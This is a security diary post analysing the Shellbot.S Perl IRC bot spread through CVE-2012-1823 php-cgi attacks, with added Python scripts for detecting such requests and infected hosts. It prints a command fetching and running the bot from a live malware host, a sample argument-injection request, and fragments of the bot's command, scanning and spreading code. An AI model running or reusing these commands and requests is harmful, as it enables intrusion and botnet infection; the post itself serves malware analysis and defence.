In the oldie-but-goodie category, reader Jon Turner sent us a fun example of old-school malfeasance this morning that I'll share for your review and tactical opportunities.
I let him speak for himself:
We've been getting pretty regularly pinged with attempts to exploit CVE-2012-1823. We're not vulnerable for a few different reasons, so I'd been ignoring it, but I finally got around to pulling down a packet capture of the traffic and inspecting it. The attack attempts to disable a few security-related PHP configuration settings, disable Suhosin, and then pull down and execute a Perl script via a system call.
Though I think our attacker is a bot or script kiddie (they didn't bother to fingerprint the server and pass an attack for the right OS), the script is pretty interesting. Forefront detects it as Backdoor:Perl/Shellbot.S. There are sections of the code for joining an IRC channel for CC, performing port scans, and automatically exploiting other systems. It looks like more than one developer was involved in writing the exploit code.
Let's have a little fun and dig into Shellbot.S a bit.
As also described by Jon, the evil bits are still available at the URL in the base64-encoded instructions in the packets:
data=' ?'
If you're following along at home, use a sandboxed/isolated Linux VM that you can reset when you're finished.
Via your favorite base64 encoder/decoder (I like the HackBar Firefox add-on), decode the string above and you should end up with:
echo st4r7.system( perl php.jpg).7h33nd
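Jon's description of the attempts (php-cgi switches that turn off security-related PHP settings and Suhosin, followed by a base64-encoded instruction carrying the system() call) maps directly onto a check a defender can run over web access logs and captured request bodies. The following is an added example, not code from this diary or from Jon Turner: CVE-2012-1823 is the php-cgi argument-injection bug, in which a query string with no unencoded "=" is handed to php-cgi as command-line switches, so "-d directive=value" overrides php.ini from the URL. The access-log lines and the data= body below are constructed, and which directives to alarm on is this example's own choice.

```python
"""Spot CVE-2012-1823 (php-cgi argument injection) attempts in web access logs
and decode the base64 payload such a request carries.

Added example for this diary, not code from the ISC post or from Jon Turner.
Sample log lines and the POST body below are constructed.
"""
import base64
import re
from urllib.parse import unquote_plus

# php.ini and Suhosin directives worth alarming on when overridden from a
# query string (the sighting above switched off security settings and
# Suhosin). The directive names are real; which ones to watch is our choice.
SECURITY_DIRECTIVES = {
    "allow_url_include", "auto_prepend_file", "safe_mode", "disable_functions",
    "open_basedir", "suhosin.simulation",
}

# CVE-2012-1823: a query string with no unencoded "=" is passed to php-cgi as
# argv, so "?-d+allow_url_include%3Don" arrives as "-d allow_url_include=on".
_REQUEST = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/[\d.]+"')
_ARG_INJECT = re.compile(r"\?\s*-[A-Za-z]")          # query string opening with a switch
_D_OVERRIDE = re.compile(r"-d\s*([A-Za-z_.]+)\s*=\s*(\S*)")


def check_request(log_line):
    """Return {directive: value} for the -d overrides pushed through the query
    string of the request in log_line, or None if the line shows no
    php-cgi switch injection."""
    m = _REQUEST.search(log_line)
    if not m:
        return None
    target = unquote_plus(m.group(1))     # %2D%64 -> -d, '+' -> space, %3D -> =
    if not _ARG_INJECT.search(target):
        return None
    return dict(_D_OVERRIDE.findall(target))


def scan_log(lines):
    """Return (line_no, overrides, risky) per suspicious line; risky lists the
    overridden directives that are in SECURITY_DIRECTIVES."""
    hits = []
    for n, line in enumerate(lines, 1):
        overrides = check_request(line)
        if overrides is not None:
            hits.append((n, overrides, sorted(set(overrides) & SECURITY_DIRECTIVES)))
    return hits


_B64 = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
_SHELL_HINTS = ("system(", "exec(", "passthru(", "shell_exec(", "wget ", "perl ")


def decode_payload(body):
    """Decode base64 runs in a captured request body; return the first decoded
    text that calls out to the shell, else None."""
    for blob in _B64.findall(body):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        if any(hint in text for hint in _SHELL_HINTS):
            return text
    return None


# Constructed sample: one ordinary request and one CVE-2012-1823 attempt
# (a URL-encoded "-d" switch list aimed at /cgi-bin/php).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Jul/2012:13:40:02 +0000] "GET /index.php?id=42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [11/Jul/2012:13:41:17 +0000] "POST /cgi-bin/php?%2D%64+allow_url_include%3Don'
    '+%2D%64+safe_mode%3Doff+%2D%64+suhosin.simulation%3Don+%2D%64+auto_prepend_file%3Dphp%3A%2F%2Finput'
    '+-n HTTP/1.1" 200 0',
]
# Constructed body in the shape of the diary's data= parameter: the decoded
# PHP echoes markers around a system() call, as in the captured instruction.
SAMPLE_BODY = "data=" + base64.b64encode(
    b'echo "st4r7".system("perl php.jpg")."7h33nd";').decode()

if __name__ == "__main__":
    for n, overrides, risky in scan_log(SAMPLE_LOG):
        print(f"line {n}: overrides {overrides}; security-relevant: {risky}")
    print("payload:", decode_payload(SAMPLE_BODY))
```

The request target is URL-decoded before matching so that `%2D%64` and `+` are seen the way php-cgi saw them; a log that only shows `-d` in its raw form would otherwise slip past a plain string search. The decoder is deliberately loose (any base64 run of 20+ characters) because the marker strings around the instruction vary between kits.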
From my Ubuntu VM I conducted the following:
malman@ubuntu:~$ netstat -ano | grep ESTABLISHED
No results.
Went and wgot the bot code.
malman@ubuntu:~$ wget http://ckboot.altervista.org/php.jpg
--2012-07-11 13:47:41--  http://ckboot.altervista.org/php.jpg
Resolving ckboot.altervista.org... 178.63.21.200
Connecting to ckboot.altervista.org|178.63.21.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15728 (15K) [image/jpeg]
Saving to: `php.jpg'
100%[=========================================================================================] 15,728 27.1K/s in 0.6s
2012-07-11 13:47:51 (27.1 KB/s) - `php.jpg' saved [15728/15728]
Followed orders per the base64 instructions:
malman@ubuntu:~$ perl php.jpg
Now we have results: an instant IRC hookup.
malman@ubuntu:~$ netstat -ano | grep ESTABLISHED
tcp 0 0 192.168.45.132:33371 83.66.116.112:6667 ESTABLISHED off (0.00/0/0)
My Ubuntu VM was not running an SSH daemon; I didn't even have it installed.
But line 14 of the spreader
Yep, confirmed:
malman@ubuntu:~$ ps aux | grep sshd
malman 17940 96.3 0.2 6944 2592 pts/3 R 13:49 2:23 /usr/sbin/sshd
As Jon stated, in the code we see that the script:
1) Joins an IRC channel for CC
my @hostauth=("localhost");
my @canais=("#consola");
2) Performs port scans
@portas=(21,22,23,25,80,113,135,445,1025,5000,6660,6661,6662,6663,
6665,6666,6667,6668,6669,7000,8080,8018
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
3) Automatically exploits unpatched PHP applications, using Google search results to find candidate targets.
Starting at line 209:
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1." seconds.");
Starting at line 491:
my $query="www.google.com/search?q=";
$query.=num=$nstart=$s
while ($page =~m/<a class=l href=\"?http:\/\/([^\"]+)\"?/g){
A check of the $funcarg parameters also reveals that Shellbot.S includes TCP, UDP, and HTTP flooding functionality.
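The two things the VM walkthrough above surfaced (an outbound ESTABLISHED connection to port 6667 the moment the script ran, and a process calling itself /usr/sbin/sshd on a box with no sshd installed) and the bot's own port list and IRC channel setup are what a host triage pass should look for. The following is an added example, not code from this diary or from the bot: it parses netstat output of the layout shown above for connections to IRC ports, and compares each process's argv[0] with the binary actually mapped at /proc/<pid>/exe, which is what gives away a Perl script that has rewritten its $0. The IRC port set is taken from the bot's @portas list; the /proc comparison, its benign-mismatch handling, and the sample process records are this example's own (the first netstat line is the diary's).

```python
"""Host triage for the two artifacts the diary observed after running the bot:
an outbound IRC connection and a process claiming to be /usr/sbin/sshd.

Added example, not code from the ISC post. IRC ports come from the bot's
own port list above; the /proc comparison is our own heuristic. Sample
records are constructed except for the diary's netstat line.
"""
import os
import re

# IRC ports from the bot's @portas list (6660-6669, 7000); its C2 used 6667.
IRC_PORTS = set(range(6660, 6670)) | {7000}

# Matches the 'netstat -ano' layout shown in the diary; trailing columns
# (such as the PID/Program column from -p) are ignored.
_NETSTAT = re.compile(
    r"^(tcp6?|udp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+ESTABLISHED")


def irc_connections(netstat_lines):
    """Return (local_endpoint, remote_ip, remote_port) for every established
    connection whose remote port is an IRC port."""
    hits = []
    for line in netstat_lines:
        m = _NETSTAT.match(line.strip())
        if m and int(m.group(5)) in IRC_PORTS:
            hits.append((f"{m.group(2)}:{m.group(3)}", m.group(4), int(m.group(5))))
    return hits


def _same_program(claimed, actual):
    """True when argv[0]'s first token plausibly names the mapped executable.
    Tolerates '-bash' login shells and 'python3' vs 'python3.10'."""
    claimed = claimed.lstrip("-")
    return bool(claimed) and (actual.startswith(claimed) or claimed.startswith(actual))


def masquerading(processes):
    """processes: iterable of (pid, argv0, exe). Return records whose argv[0]
    names a program other than the binary really mapped as exe, which is what
    ps shows once a script rewrites $0 (Perl) or its process title."""
    hits = []
    for pid, argv0, exe in processes:
        first = argv0.split()[0] if argv0.strip() else ""
        # Real sshd session children retitle to 'sshd: user@pts/0'; compare
        # only the first token so they are not flagged.
        claimed = os.path.basename(first).rstrip(":")
        actual = os.path.basename(exe).split(" (deleted)")[0]
        if exe and not _same_program(claimed, actual):
            hits.append((pid, argv0, exe))
    return hits


def collect_from_proc():
    """Read argv[0] and the exe link of every process in /proc (Linux only);
    processes we cannot inspect (other users', kernel threads) are skipped."""
    records = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode("utf-8", "replace")
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue
        if argv0:
            records.append((pid, argv0, exe))
    return records


# Constructed process records: the diary's bot (argv[0] rewritten to sshd,
# mapped binary is perl), a genuine sshd, and two benign mismatches.
SAMPLE_PROCS = [
    (17940, "/usr/sbin/sshd", "/usr/bin/perl"),
    (1203, "/usr/sbin/sshd", "/usr/sbin/sshd"),
    (2210, "python3", "/usr/bin/python3.10"),
    (2300, "-bash", "/bin/bash"),
]
# The diary's netstat line plus a constructed HTTPS connection.
SAMPLE_NETSTAT = [
    "tcp 0 0 192.168.45.132:33371 83.66.116.112:6667 ESTABLISHED off (0.00/0/0)",
    "tcp 0 0 192.168.45.132:40112 198.51.100.7:443 ESTABLISHED off (0.00/0/0)",
]

if __name__ == "__main__":
    print("IRC connections:", irc_connections(SAMPLE_NETSTAT))
    print("masquerading (sample):", masquerading(SAMPLE_PROCS))
    if os.path.isdir("/proc"):
        print("masquerading (this host):", masquerading(collect_from_proc()))
```

Run netstat with -p as well (root needed to see other users' sockets) so the IRC hit can be tied straight to a PID and then to /proc/<pid>/exe; the parser ignores the extra column. The argv[0] comparison is a triage heuristic, not proof: an interpreter whose title has been rewritten is the common case here, but review each mismatch before acting on it.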
There are references to this source code being reported to SecurityFocus as seen in attacks as far back as 2006.
But my favorite reference in this classic-come-lately?
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
Script kiddie indeed.
Keep those PHP apps and instances patched, folks.
Russ McRee | @holisticinfosec
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.